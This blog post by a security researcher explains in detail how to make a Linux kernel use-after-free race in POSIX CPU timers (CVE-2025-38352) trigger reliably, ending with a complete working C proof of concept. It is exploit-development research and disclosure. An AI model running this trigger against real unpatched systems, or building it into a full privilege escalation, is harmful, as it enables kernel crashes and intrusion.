CVE-2025-38352 (Part 2) - Extending The Race Window Without a Kernel Patch

December 23, 2025

In part 1, I went through a step by step process on how to construct a PoC that triggers the vulnerability. Unfortunately, it had a few issues:

  1. It barely ever worked without the kernel patch I introduced that artificially extended the race window by 500ms.
  2. The timer setup itself was not very clean. There are definitely better ways to consume a controlled amount of CPU time up such that the timer can fire at a controlled moment in the future.

In this blog post, I will walk you through how I solved both of the above issues, and ended up with a PoC that works without any kernel patches.

Table of Contents

PoC + Demo

As always, if you're just here for the PoC, it's linked below.

https://github.com/farazsth98/poc-CVE-2025-38352/blob/main/poc.c

And a short demo (without KASAN)! 😄

demo

For reference, my QEMU command is shown below as well:

qemu-system-x86_64 \
    -enable-kvm \
    -cpu host \
    -smp 4 \
    -kernel ./bzImage \
    -initrd ./initramfs.tgz \
    -nographic \
    -append "console=ttyS0 kgdbwait kgdboc=ttyS1,115200 oops=panic panic=0 nokaslr" \
    -m 3G \
    -netdev user,id=mynet0 \
    -device virtio-net-pci,netdev=mynet0 \
    -s

Recap

Please read part 1 of this series before continuing!

The way I consumed CPU time inside the REAPEE thread to trigger the vulnerability in my previous PoC went like this:

void reapee(void) {
    // [ ... ]

    struct itimerspec ts = {
        .it_interval = {0, 0},
        .it_value = {
            .tv_sec = 0,
            .tv_nsec = wait_time, // Custom wait time
        },
    };

    // Wait for parent to attach
    pthread_barrier_wait(&barrier);

    SYSCHK(timer_settime(timer, 0, &ts, NULL));

    // Use some CPU time to make sure the timer will fire correctly
    for (int i = 0; i < 1000000; i++);

    // Hopefully we used enough CPU time to trigger the timer after `exit_notify()`
    // zombifies us and wakes up the parent process
    return;
}

The wait_time was provided via argv, and the for loop was just set up randomly to something that worked. Basically, there is zero control over how much CPU time is consumed after the timer is set.

Can we improve this? Of course!

CPU Scheduler Internals (Not Really)

In order to understand how to control how much CPU time a thread uses, I had to do a semi-deep dive into the CPU scheduler, POSIX timers, and how the different types of CPU timers (CPUCLOCK_PROF, CPUCLOCK_VIRT, CPUCLOCK_SCHED) worked.

Summarizing Key Points

I won't go too deep into it (it deserves it's own blog post, honestly), but to summarize some of the key points (summaries may not be 100% accurate):

  1. The CPU scheduler triggers an interrupt once every 1 / CONFIG_HZ seconds. This is when run_posix_cpu_timers() will run.
    • Typically, CONFIG_HZ=1000, so a CPU scheduler "tick" occurs once every 1 ms.
      • This is the case for the Android and Ubuntu kernels anyway.
  2. There are three types of CPU clock timers:
    • CPUCLOCK_PROF - Counts total CPU time consumed by userland + kernel.
    • CPUCLOCK_VIRT - Counts total CPU time consumed by userland ONLY.
    • CPUCLOCK_SCHED - Counts total time actually spent running on a CPU. Important for threads which can be scheduled in and out by the scheduler.
  3. Timer expiry checks are always done on a tick boundary, so the expiry checks can occur at most once every 1 / CONFIG_HZ seconds.
  4. CPUCLOCK_PROF and CPUCLOCK_VIRT clocks are only updated after they've used up 1 / CONFIG_HZ of CPU time.
    • CPUCLOCK_SCHED is special-cased. It updates every nanosecond instead.
    • This means that CPUCLOCK_SCHED is typically used for profiling in cases where granularity finer than 1 ms is necessary.
  5. For triggering the vulnerability, we can technically use any of the three clock types.
    • My PoC uses CLOCK_THREAD_CPUTIME_ID for the timer, which is a CPUCLOCK_SCHED timer.
    • There is a good reason to use this specific timer type, which will be explained later in this post!

That should be the minimum amount of information necessary to undersetand the following sections.

Profiling CPU Time Usage

In order to consume a controlled amount of CPU time, we need to actually know how much time some concrete amount of work uses.

For any profiling, we need to be able to fetch the amount of total CPU time consumed (by the thread being profiled) at two or more separate execution points. This can be done using the clock_gettime system call.

For the "concrete amount of work" that we'll profile, I chose the getpid system call, as it is easy to use and consumes very little CPU time.

Now, unsurprisingly, the clock_gettime system call itself also consumes CPU time, so we have to account for this overhead in our profiling code too.

To that end, here is some proof-of-concept code that can be used to figure out exactly how much CPU time the getpid system call consumes (click here for the full PoC):

#define NUM_SAMPLES 100000
static long int clock_gettime_avg = 0;

// Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls,
// this works just fine
long int getpid_avg_cputime_used() {
    struct timespec *ts = malloc(NUM_SAMPLES * sizeof(struct timespec));

    if (clock_gettime_avg == 0) {
        for (int i = 0; i < NUM_SAMPLES; i++) {
            syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
        } 
    
        long int total_nsec = 0;
    
        for (int i = 0; i < NUM_SAMPLES-1; i++) {
            long int time_taken = (long int)(ts_to_ns(&ts[i + 1]) - ts_to_ns(&ts[i]));
            total_nsec += time_taken;
        }
    
        clock_gettime_avg = total_nsec / (NUM_SAMPLES-1);
    }

    for (int i = 0; i < NUM_SAMPLES; i++) {
        syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
        
        // Do whatever you're measuring here
        syscall(__NR_getpid);
    }

    long int total_nsec = 0;
    for (int i = 0; i < NUM_SAMPLES-1; i++) {
        long int time_taken = (long int)(ts_to_ns(&ts[i + 1]) - ts_to_ns(&ts[i])) - clock_gettime_avg;
        total_nsec += time_taken;
    }

    free(ts);
    return total_nsec / (NUM_SAMPLES-1);
}

And here's some output from my QEMU VM (4 cores, 3GB RAM):

/ # /poc
clock_gettime avg: 489 ns
getpid avg: 139 ns
/ # /poc
clock_gettime avg: 495 ns
getpid avg: 143 ns
/ # /poc
clock_gettime avg: 491 ns
getpid avg: 133 ns
/ # /poc
clock_gettime avg: 495 ns
getpid avg: 130 ns

Obviously, the PoC uses averages, so the times aren't 100% accurate, but CPU time usage for any system call is never going to be consistent across multiple runs, so this average is as good as it gets (I think so anyway... If you have a better way to calculate this, please let me know!)

The First Improvement - Controlled CPU Time Consumption

The first improvement we can make to our PoC is to consume CPU time in the REAPEE thread in a more controlled manner by doing the following:

  1. Use the profiling code to get the average CPU time consumed by the getpid system call.
  2. Arm the timer to fire after 1 ms (1,000,000 ns) CPU time is consumed.
  3. Run the getpid system call in a loop enough times to consume close to the 1 ms of CPU time (but crucially, not all of it!).

At this point, any remaining CPU time will be used by the kernel in do_exit() -> exit_notify(), and if the getpid system call loop consumed just enough CPU time, the timer should fire and trigger handle_posix_cpu_timers() after exit_notify() zombifies the REAPEE thread and wakes up the reaping parent process.

Note: The 3rd step above can be made more accurate by profiling how much CPU time is used by do_exit() -> exit_notify() (by patching the kernel), but I did not bother with this step yet.

Here are the improvements shown in the PoC:

// Get the average CPU time usage of the `getpid()` syscall, so we
// can use it for the trigger later
getpid_avg = getpid_cpu_usage();

// [ ... ]

// After timers are armed, waste just the right amount of CPU time now 
// without firing any of the timers
for (int i = 0; i < ((ONE_MS_NS / getpid_avg) - syscall_loop_times); i++) {
    syscall(__NR_getpid);
}

// This `return` will trigger `do_exit()` in the kernel, which hopefully will
// fire the timers after `exit_notify()` wakes up the `waitpid()` in the exploit
// parent process
return;

In the above PoC, syscall_loop_times is a variable that starts at 20 and increments on each retry, capped at SYSCALL_LOOP_TIMES_MAX=150 in my PoC. Since the amount of CPU time used is not always accurate, my final PoC tries to increase this every retry to ensure that the race is guaranteed to hit.

This one change drastically improves the likelihood of handle_posix_cpu_timers() running after exit_notify() wakes up the reaping parent process.

Additionally, it also makes the PoC system-agnostic, as different systems will consume different amounts of CPU time for the same amount of work.

Extending The Race Window - Part 1

Now for the second (and arguably more annoying problem): how do we extend the race window?

Using More Timers

The first improvement we can make should be obvious. Remember that handle_posix_cpu_timers() collects all firing timers in a local firing list, and then iterates over them (code simplified below):

static void handle_posix_cpu_timers(struct task_struct *tsk)
{
	// Faith: local `firing` list
	LIST_HEAD(firing);

	if (!lock_task_sighand(tsk, &flags))
		return;

	do {
		// [ ... ]
        // Faith: collect all thread and process timers
		check_thread_timers(tsk, &firing);
		check_process_timers(tsk, &firing);
	} while (!posix_cpu_timers_enable_work(tsk, start));

	// [ ... ]
	unlock_task_sighand(tsk, &flags);

	// Faith: iterate over the `firing` list and fire the timers
	list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
		// [ ... ]
	}
}

My old PoC only used one timer, which means that the firing list is only iterated over once. Not a lot of time for us to free the timer before it's used, right?

We can improve on this by doing two things:

  1. Fill up the firing list to it's max capacity.
  2. Make the very last timer on the firing list our target UAF timer.

Now, the handle_posix_cpu_timers() calls check_thread_timers() before check_process_timers(). Since timers are inserted into the tail of the firing list, we can't make use of process timers, as they will all be inserted after our UAF timer.

That leaves us with thread timers. How many can we insert into the firing list?

static void check_thread_timers(/* ... */)
{
	struct posix_cputimers *pct = &tsk->posix_cputimers;
	u64 samples[CPUCLOCK_MAX];
	// [ ... ]

	task_sample_cputime(tsk, samples);
	collect_posix_cputimers(pct, samples, firing);
    // [ ... ]
}

static void collect_posix_cputimers(/* ... */)
{
    // [ ... ]
	for (i = 0; i < CPUCLOCK_MAX; i++, base++) {
		base->nextevt = collect_timerqueue(&base->tqhead, firing,
						    samples[i]);
	}
}

#define MAX_COLLECTED	20

static u64 collect_timerqueue(/* ... */)
{
	// [ ... ]
	while ((next = timerqueue_getnext(head))) {
		// [ ... ]
		/* Limit the number of timers to expire at once */
		if (++i == MAX_COLLECTED || now < expires)
			return expires;

		// [ ... Add the timer to the `firing` list's tail here ... ]
	}

	return U64_MAX;
}

In the above code, CPUCLOCK_MAX signifies the three types of clocks mentioned in the CPU Scheduler Internals section, so it is set to 3.

Additionally, note that the MAX_COLLECTED check in collect_timerqueue() above is actually off-by-one. So instead of allowing a maximum of 20 timers to be collected per clock type, it only collects up to 19 timers instead.

So putting all of that together, we can collect up to 19 * 3 = 57 timers in the firing list. And to top it off, we have some luck on our side: CPUCLOCK_SCHED (which is the clock type we use to create the UAF timer) is the very last clock type!

#define CPUCLOCK_PROF		0
#define CPUCLOCK_VIRT		1
#define CPUCLOCK_SCHED		2
#define CPUCLOCK_MAX		3

In my PoC, I only used 19 CPUCLOCK_SCHED type timers, as that ends up extending the race window enough to trigger the vulnerability.

However, since exploitation will very likely require using the cross-cache technique to re-allocate the freed struct k_itimer as something else, I will probably have to end up using all 57 timers here later on. This is also the reason I used CPUCLOCK_SCHED type timers for the PoC, as it gives us the largest potential race window.

Firing All Timers At Once

In order to fire all timers at once, we can utilize the fact that the a CLOCK_THREAD_CPUTIME_ID type timer will only progress if the thread that creates the timer consumes CPU time.

So to fire all 19 timers at once, we just need to do the following:

  1. Create all 19 CPU timers (18 "stall" timers + our UAF timer) on our REAPEE thread, then put it to sleep.
    • Ensure it's not a busy sleep, so it doesn't consume CPU time.
    • I used a pthread_barrier_t to achieve this.
  2. On another thread, call timer_settime() to arm all timers to fire after 1,000,000 ns (1 ms) of CPU time is consumed.
    • Since this thread did not create the timers, the timers will not progress at all (because the REAPEE thread, which is sleeping, is the only one that can progress these timers).
  3. We must ensure to set the 18 "stall" timers to fire after 1,000,000 - 1 ns of CPU time is consumed.
    • The UAF timer must still fire after 1,000,000 ns of CPU time is consumed.
    • This step ensures that the UAF timer is the last on the firing list, as the firing list is sorted by the expiry time.

After doing the above, we can wake up the REAPEE thread and use our improvements from the previous section to consume just less than 1 ms of CPU time to trigger handle_posix_cpu_timers() at the right time.

How Much Did It Help?

In order to figure out how much CPU time is actually being consumed by the firing list iteration in handle_posix_cpu_timers(), I used the following kernel patch. I ensured not to accidentally extend the race window (my final PoC works without this patch).

The important part of the patch is shown below. It profiles how much time is spent iterating over the firing list and firing each timer:

@@ -1356,6 +1362,10 @@ static void handle_posix_cpu_timers(struct task_struct *tsk)
 	 */
 	unlock_task_sighand(tsk, &flags);
 
+	// Faith: profile the time taken to handle the timers
+	if (profile)
+		profile_t0 = ktime_get_mono_fast_ns();
+
 	/*
 	 * Now that all the timers on our list have the firing flag,
 	 * no one will touch their list entries but us.  We'll take
@@ -1387,6 +1397,13 @@ static void handle_posix_cpu_timers(struct task_struct *tsk)
 		rcu_assign_pointer(timer->it.cpu.handling, NULL);
 		spin_unlock(&timer->it_lock);
 	}
+
+	// Faith: profile the time taken to handle the timers
+	if (profile) {
+		profile_t1 = ktime_get_mono_fast_ns();
+		printk("handle_posix_cpu_timers: delta_ns=%llu\n",
+			(unsigned long long)(profile_t1 - profile_t0));
+	}

The PoC I used to test this profiling code can be seen here. Note that this profiling PoC also includes changes that extends the race window even further (I'll discuss them in the next section).

The important parts of the PoC are as follows (follow the links):

  1. REAPEE thread creates the 19 timers and goes to sleep.
  2. Main thread arms all 19 timers and wakes up the REAPEE thread.
  3. REAPEE thread uses up more than enough CPU time to trigger handle_posix_cpu_timers().

The dmesg logs after running this PoC (without the extra changes that increase the race window even more) are as follows:

~ $ /poc
[   10.543155] handle_posix_cpu_timers: delta_ns=3140
~ $ /poc
[   10.964147] handle_posix_cpu_timers: delta_ns=4990
~ $ /poc
[   11.404146] handle_posix_cpu_timers: delta_ns=6000

On average, the amount of time spent iterating over 19 timers in the firing list is approximately between 4000-7000 ns.

From my testing, this is still not enough to trigger the vulnerability:

  1. It's still incredibly difficult to hit this race window with our timer_delete() after reaping the zombie REAPEE thread.
  2. There's basically no time for the RCU free to occur even if we win the race.

So, we need to figure out how to extend the race window even further... Nanoseconds aren't enough, we need milliseconds!

Extending The Race Window - Part 2

On a high level, we have two other options to extend the race window:

  1. The list iteration attempts to acquire both the timer->it_lock, and later the task->sighand->siglock. If another CPU can hold these locks for an extended period of time at the right moment, we can extend the race window.
  2. Firing timers involves sending signals, re-arming timers, and a bunch of other things. Maybe we can study that flow to figure out how to extend the race window?

Option 1 - Lock Collisions

I audited through all the code paths that acquired timer->it_lock and task->sighand->lock to figure out if there were any good options that allowed holding the locks for an extended amount of time. However, there are a few issues with this approach.

The first issue with both locks has to do with the short race window. Not only do we need to acquire either lock inside the race window, but we also need to acquire it right when the firing list is about to acquire the lock for that specific timer / task. This is incredibly difficult to do within the 4000-7000 ns race window.

The second issue is that I could not find any code paths that acquired the locks for a large / controlled amount of time. For example, even though timer_gettime() calls copy_to_user(), it drops the timer->it_lock before doing so. Overall, all the code paths acquired and dropped the locks very quickly.

However, I learned something a while ago from a blog post by Jann Horn - preemptible kernels like the Android kernel can preempt code at any point, unless the code is running in some context where preemption is disabled.

Knowing this, could I somehow cause timer->it_lock / task->sighand->lock to be acquired by a task on another CPU, and then have that task be preempted so that the lock is held for an extended period of time?

Unfortunately, the answer was no. Both of these locks are acquired via spin_lock()/spin_lock_irq()/spin_lock_irqsave(), which disables preemption while the lock is held.

Therefore, lock collisions were definitively out of the question.

Option 2 - Firing Timers For Longer

I spent a while auditing through cpu_timer_fire() to see how the timer firing logic was implemented. I was mainly looking for loops where I could have some control over the number of iterations from userland.

The function complete_signal() caught my eye. It can be reached via the following call stack:

handle_posix_cpu_timers()
-> cpu_timer_fire()
-> posix_timer_queue_signal()
-> send_sigqueue()
-> complete_signal()

Inside complete_signal(), I noticed two while loops (code simplified below):

static void complete_signal(int sig, struct task_struct *p, enum pid_type type)
{
	// [ ... ]
    // Faith: If a PID is specified to deliver the signal to, and that thread / process
    //        is accepting this signal, use it
	if (wants_signal(sig, p))
		t = p;
    // Faith: Else if that PID does accept this signal, and there are no other threads,
    //        just return early.
	else if ((type == PIDTYPE_PID) || thread_group_empty(p))
		return;
	else {
		// Faith: iterate over every thread until we find one that is accepting this
        //        signal
		t = signal->curr_target;
		while (!wants_signal(sig, t)) {
			t = next_thread(t);
			if (t == signal->curr_target)
				// Faith: no thread found accepting this signal, just return
				return;
		}
		signal->curr_target = t;
	}

	// Faith: If a fatal signal is detected (and some other conditions)
	if (sig_fatal(p, sig) &&
	    (signal->core_state || !(signal->flags & SIGNAL_GROUP_EXIT)) &&
	    !sigismember(&t->real_blocked, sig) &&
	    (sig == SIGKILL || !p->ptrace)) {
		// [ ... ]
        // Faith: The code here iterates over every thread in this thread
        //        group and delivers a `SIGKILL` to it to kill it.
	}
    // [ ... ]
}

In this code above, we have two loops.

  1. The first while loop is entered if we make the timer send a signal without specifying a TID. It will iterate over every thread in the thread group to find one that does not have this signal blocked (signals can be blocked via sigprocmask()).
  2. The second loop is commented out, but it is only entered if the signal to be delivered is considered fatal (plus some other conditions). This will actually kill every thread in this thread group.

Now, I believe the second loop is practically unusable because it kills every thread in the thread group. But I don't want to eat my words later 😅 There could be a scenario where multiple processes can be synced up to all have their timers fire on the same CPU. In such a scenario, these other "useless" processes can get killed without affecting the main exploit process, possibly making the second loop exploitable after all. However, I have not tested nor verified this.

In my PoC, I only used the first while loop to extend the race window. Let's look at how to do that now, shall we?

The Second Improvement - Spamming Threads

From looking at complete_signal() above, we see that it iterates over every single thread in the current process until it finds one that "wants" the signal.

So, how is wants_signal() implemented? (code simplified below):

static inline bool wants_signal(int sig, struct task_struct *p)
{
	if (sigismember(&p->blocked, sig))
		return false;

	// [ ... ]
}

There were actually a few more conditions in wants_signal(), but the first thing it checks is to see if the thread is blocking the signal that the timer is trying to send.

The ->blocked field contains a bitmap of signals to block. It can have signals added to it by using sigprocmask() with SIG_BLOCK (code simplified below):

int sigprocmask(int how, sigset_t *set, sigset_t *oldset)
{
	// [ ... ]
	switch (how) {
	case SIG_BLOCK:
		sigorsets(&newset, &tsk->blocked, set);
		break;
	// [ ... ]
	}

	__set_current_blocked(&newset);
	return 0;
}

So, knowing the above, we have a way to force the kernel to iterate over this while loop as many times as we want for each of our 18 "stall" timers. We're only limited by how many threads we can create.

The steps to achieve this are as follows:

  1. Before creating any threads in the exploit child process, block SIGUSR1 via sigprocmask().
    • The exploit child process is the one that contains the REAPEE thread.
  2. Create the REAPEE thread. When creating the timers, ensure the timer's sigevent.sigev_notify is set to SIGEV_SIGNAL.
    • This will try to send the signal to any thread in the current thread group that accepts the signal.
  3. Create as many threads as possible in the exploit child process (I used NUM_SLEEP_THREADS=10000).
    • These threads (and the REAPEE thread from above) will inherit the blocked SIGUSR1 from the exploit child process.
  4. Continue with triggering the vulnerability as usual.

Once the timers fire, the firing list iteration inside handle_posix_cpu_timers() will call into complete_signal() once for each timer, and each timer will iterate NUM_SLEEP_THREADS=10000 times in the while loop inside complete_signal() before returning.

I've already implemented this in the same profiling PoC from before. Running this with this second improvement results in the following output:

~ $ /poc
[    2.386969] handle_posix_cpu_timers: delta_ns=4895749
~ $ /poc
[    3.101971] handle_posix_cpu_timers: delta_ns=3904588
~ $ /poc
[    3.679125] handle_posix_cpu_timers: delta_ns=4052398

A huge improvement! The amount of time spent iterating over the firing list is now between 4,000,000-5,000,000 ns (4-5 milliseconds)! This is definitely more than enough time to both:

  1. Hit timer_delete() inside the race window.
  2. Let the RCU free complete so that the UAF can trigger.

With this, the PoC can trigger the race condition without any artificial kernel patches.

Some Miscellaneous Improvements And Ideas

I also made a few more improvements to the final PoC:

  1. I implemented the retry logic directly in the PoC, so you can just run /poc instead of while true; do /poc; done.
  2. I added a 1 ms sleep before deleting the timer. Since the race window is going to be open for at least 3 milliseconds, this is useful to guarantee that the timer_delete() actually lands inside the race window.

Plans On Part 3?

At the time of writing this post, I'm definitely planning on continuing to work on the exploit for this vulnerability. Cross-cache is very doable here, it's just a matter of figuring out when we win vs when we lose the race.

However, since it's the holiday season now, it will be a while before I get around to finishing this. But rest assured! This has been a really good vulnerability to practice and improve my exploit development skills with, so I have a good feeling about finishing this! 😄

Conclusion

As always, if you have any questions, please don't hesitate to ask!

Final PoC

The final PoC, along with the kernel profiler patch (and the profiling PoC I used to test the length of the race window) can all be found on my Github repo:

https://github.com/farazsth98/poc-CVE-2025-38352

I'll also put the demo and PoC below. This is the end of the blog post!

demo
#define _GNU_SOURCE
#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdlib.h>
#include <err.h>
#include <sys/prctl.h>
#include <sched.h>
#include <linux/membarrier.h>
#include <sys/syscall.h>

#define SYSCHK(x) ({            \
    typeof(x) __res = (x);      \
    if (__res == (typeof(x))-1) \
      err(1, "SYSCHK(" #x ")"); \
    __res;                      \
})

#define NUM_SAMPLES 100000
#define NUM_TIMERS 18
#define ONE_MS_NS 1000000uLL
#define NUM_SLEEP_THREADS 10000
#define NUM_SLEEP_THREADS_KASAN 4500 // KASAN has a smaller thread limit
#define SYSCALL_LOOP_TIMES_MAX 150

void pin_on_cpu(int i) {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(i, &mask);
    sched_setaffinity(0, sizeof(mask), &mask);
}

void wait_for_rcu() {
    syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0);
}

static inline long long ts_to_ns(const struct timespec *ts) {
    return (long long)ts->tv_sec * 1000000000LL + (long long)ts->tv_nsec;
}


static long int clock_gettime_avg = 0;
static long int getpid_avg = 0;

// Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls,
// this works just fine
long int getpid_cpu_usage() {
    struct timespec *ts = malloc(NUM_SAMPLES * sizeof(struct timespec));

    // If we don't have `clock_gettime` avg CPU time usage, get it now
    if (clock_gettime_avg == 0) {
        for (int i = 0; i < NUM_SAMPLES; i++) {
            syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
        } 
    
        long int total_nsec = 0;
    
        for (int i = 0; i < NUM_SAMPLES-1; i++) {
            long int time_taken = (long int)(ts_to_ns(&ts[i + 1]) - ts_to_ns(&ts[i]));
            total_nsec += time_taken;
        }
    
        clock_gettime_avg = total_nsec / (NUM_SAMPLES-1);
    }

    for (int i = 0; i < NUM_SAMPLES; i++) {
        syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
        syscall(__NR_getpid);
    }

    long int total_nsec = 0;
    for (int i = 0; i < NUM_SAMPLES-1; i++) {
        long int time_taken = (long int)(ts_to_ns(&ts[i + 1]) - ts_to_ns(&ts[i])) - clock_gettime_avg;
        total_nsec += time_taken;
    }

    free(ts);
    return total_nsec / (NUM_SAMPLES-1);
}

/* Global variables for exploit setup START */
pthread_barrier_t barrier;

// Timers used to stall `handle_posix_cpu_timers()` to extend the race window
timer_t stall_timers[NUM_TIMERS];
timer_t uaf_timer;

// Thread that will trigger the timer handling, and also the thread that will
// be reaped by the exploit parent process
pthread_t reapee_thread;

int e2w[2]; // exploit process to wrapper process comm pipefds
int c2p[2]; // child to parent comm pipefds
int p2c[2]; // parent to child comm pipefds
int stall_fds[2]; // stall pipe fds for the sleep func

// Amount of LESS times to loop the `getpid()` syscall to waste CPU time
int syscall_loop_times = 20;
int retry_count = 0;
/* Global variables for exploit setup END */

void reapee_func(void) {
    // Pin to same CPU as sleeper threads
    pin_on_cpu(2);
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_SIGNAL;
    sev.sigev_signo = SIGUSR1;
    char m;

    prctl(PR_SET_NAME, "REAPEE");

    // Send this thread's TID to the parent process
    pid_t tid = (pid_t)syscall(SYS_gettid);
    SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));

    // Wait for parent to attach and continue
    pthread_barrier_wait(&barrier); // barrier 1

    // Create the maximum amount of timers minus one
    for (int i = 0; i < NUM_TIMERS; i++) {
        SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &stall_timers[i]));
    }

    // Create the UAF timer as the last timer
    SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &uaf_timer));

    // Wait for the main thread to arm the timers. This is to make sure
    // this thread does not use CPU time to arm the timers.
    pthread_barrier_wait(&barrier); // barrier 2
    pthread_barrier_wait(&barrier); // barrier 3

    // Waste just the right amount of CPU time now without firing any of the timers
    for (int i = 0; i < ((ONE_MS_NS / getpid_avg) - syscall_loop_times); i++) {
        syscall(__NR_getpid);
    }

    // This `return` will trigger `do_exit()` in the kernel, which hopefully will
    // fire the timers after `exit_notify()` wakes up the `waitpid()` in the exploit
    // parent process
    return;
}

void sleep_func(void) {
    // same CPU as REAPEE thread
    pin_on_cpu(2);
    char m;

    prctl(PR_SET_NAME, "SLEEPER");

    // Block and sleep without using the CPU
    read(stall_fds[0], &m, 1);
}

int main(int argc, char *argv[]) {
    // Loop for wrapper process
    while (1) {
        // Wrapper process setup
        printf("Wrapper: try %d\n", ++retry_count);
        SYSCHK(pipe(e2w));
        pid_t exploit_pid = SYSCHK(fork());

        if (exploit_pid) {
            // wrapper process (pinning CPU here doesn't matter)
            char m;
            close(e2w[1]);

            // Blocking read until retry
            int read_count = read(e2w[0], &m, 1);

            // If read_count > 0, retry
            if (read_count == 0) break;

            // Decrease amount of loop times for next retry, but
            // cap it at SYSCALL_LOOP_TIMES_MAX
            syscall_loop_times++;
            syscall_loop_times %= SYSCALL_LOOP_TIMES_MAX+1;
            syscall_loop_times = syscall_loop_times == 0 ? 20 : syscall_loop_times;

            // Close pipes so they can be recreated again
            close(e2w[0]);

            // Wait for exploit to exit
            waitpid(exploit_pid, NULL, __WALL);
        } else {
            // exploit process
            char m;
            close(e2w[0]);

            // Parent and child setup
            // Use pipes to communicate between parent and child
            SYSCHK(pipe(c2p));
            SYSCHK(pipe(p2c));

            // Get the average CPU time usage of the `getpid()` syscall, so we
            // can use it for the trigger later
            getpid_avg = getpid_cpu_usage();

            pid_t pid = SYSCHK(fork());
            
            if (pid) {
                // exploit parent process
                pin_on_cpu(1);
                char m;
                close(c2p[1]);
                close(p2c[0]);

                prctl(PR_SET_NAME, "EXPLOIT_PARENT");

                // Receive child process's REAPEE thread's TID
                pid_t tid;
                SYSCHK(read(c2p[0], &tid, sizeof(pid_t)));

                // Attach to the REAPEE thread and continue it
                SYSCHK(ptrace(PTRACE_ATTACH, tid, NULL, NULL));
                SYSCHK(waitpid(tid, NULL, __WALL));
                SYSCHK(ptrace(PTRACE_CONT, tid, NULL, NULL));

                // Signal to child that we attached and continued
                SYSCHK(write(p2c[1], &m, 1));

                // Reap the REAPEE thread now. This will block and wait until
                // the REAPEE thread is able to get through `exit_notify()` and
                // wake this parent process up.
                SYSCHK(waitpid(tid, NULL, __WALL));
                
                // At this point, if UAF timer fired at the right time, the REAPEE thread
                // will be reaped while it's `tsk->exit_state` is set to `EXIT_ZOMBIE`.
                //
                // Let the child process know REAPEE is reaped, so it can delete the
                // timer.
                SYSCHK(write(p2c[1], &m, 1));
                
                // Let the child process delete and free the timer, and
                // all threads before exiting
                SYSCHK(read(c2p[0], &m, 1));

                // Signal to wrapper process to retry and exit
                // TODO exploit: Figure out how to detect if we triggered UAF here
                SYSCHK(write(e2w[1], &m, 1));

                // Wait for child to exit before exiting
                waitpid(pid, NULL, __WALL);
                close(e2w[1]);
                close(c2p[0]);
                close(p2c[1]);
                exit(0);
            } else {
                // exploit child process
                pin_on_cpu(0);
                char m;
                close(c2p[0]);
                close(p2c[1]);

                // Pipefd for sleep threads to block on
                SYSCHK(pipe(stall_fds));

                // Block SIGUSR1, blocks them in subsequent threads too
                sigset_t mask;
                sigemptyset(&mask);
                sigaddset(&mask, SIGUSR1);
                sigprocmask(SIG_BLOCK, &mask, NULL);

                prctl(PR_SET_NAME, "EXPLOIT_CHILD");
                pthread_barrier_init(&barrier, NULL, 2);
                
                // Change this depending on KASAN vs no KASAN
                int num_sleep_threads = NUM_SLEEP_THREADS;
                pthread_t sleep_threads[num_sleep_threads];

                SYSCHK(pthread_create(&reapee_thread, NULL, (void*)reapee_func, NULL));

                for (int i = 0; i < num_sleep_threads; i++) {
                    int ret = pthread_create(&sleep_threads[i], NULL, (void*)sleep_func, NULL);
                    if (ret != 0) {
                        // If this condition is reached, change `num_sleep_threads` above
                        printf("Failed on thread %d\n", i+1);
                        num_sleep_threads = i;
                        break;
                    }
                }

                // Wait for all threads to create and go to sleep
                usleep(10 * 1000);

                // Parent process writes to us when attached and continued, use
                // a barrier to continue the REAPEE thread now
                SYSCHK(read(p2c[0], &m, 1));
                pthread_barrier_wait(&barrier); // barrier 1

                // Wait for timers to be created by REAPEE thread
                pthread_barrier_wait(&barrier); // barrier 2

                // Arm the timers now, ensuring the first 18 are before the
                // UAF timer
                struct itimerspec ts = {
                    .it_interval = {0, 0},
                    .it_value = {
                        .tv_sec = 0,
                        .tv_nsec = ONE_MS_NS - 1,
                    },
                };

                for (int i = 0; i < NUM_TIMERS; i++) {
                    timer_settime(stall_timers[i], 0, &ts, NULL);
                }

                // Arm UAF timer as the latest one
                ts.it_value.tv_nsec = ONE_MS_NS;
                timer_settime(uaf_timer, 0, &ts, NULL);

                // Timers are armed, let REAPEE thread continue
                pthread_barrier_wait(&barrier); // barrier 3

                // Parent process writes to us when waitpid() returns successfully.
                //
                // At this point, if we won the race, `handle_posix_cpu_timers()` will be in
                // the race window, and `timer_delete()` should see a NULL `sighand`, which 
                // will cause it to just free the timer unconditionally.
                SYSCHK(read(p2c[0], &m, 1));

                // The race window is open for at least 3ms generally, so we can sleep
                // 1ms to increase our chances to hit it with our free here.
                //
                // Might need to modify this for different systems, because it depends on
                // how much time the race window is open for. KASAN will also not allow
                // as many sleeper threads, so this will need to be lowered a bit if it's
                // enabled.
                usleep(1 * 1000);
                timer_delete(uaf_timer);
                
                // Let the timer be freed by RCU, then let the parent process know it can exit
                wait_for_rcu();

                // At this point, either the UAF triggered, and you'll see the kernel warning
                // or KASAN splat, or we failed. 
                //
                // TODO exploit: Figure out how to detect if we won the race here
                for (int i = 0; i < num_sleep_threads; i++) {
                    write(stall_fds[1], &m, 1);
                }
                for (int i = 0; i < num_sleep_threads; i++) {
                    pthread_join(sleep_threads[i], NULL);
                }

                // Signal to parent to exit
                SYSCHK(write(c2p[1], &m, 1));

                // Wait for parent to exit
                close(c2p[1]);
                close(p2c[0]);
                close(stall_fds[0]);
                close(stall_fds[1]);
                exit(0);
            }
        }
    }

    // If we break out of the while loop above, the race was won
    // TODO exploit:
    exit(0);
}

Profile picture

Hello! I am Faraz. I'm a Lead Security Researcher at Zellic, focusing on L1 blockchain security.

Prior to this, I was a vulnerability researcher in Dataflow Security, where I focused on Chrome and the Android userland.

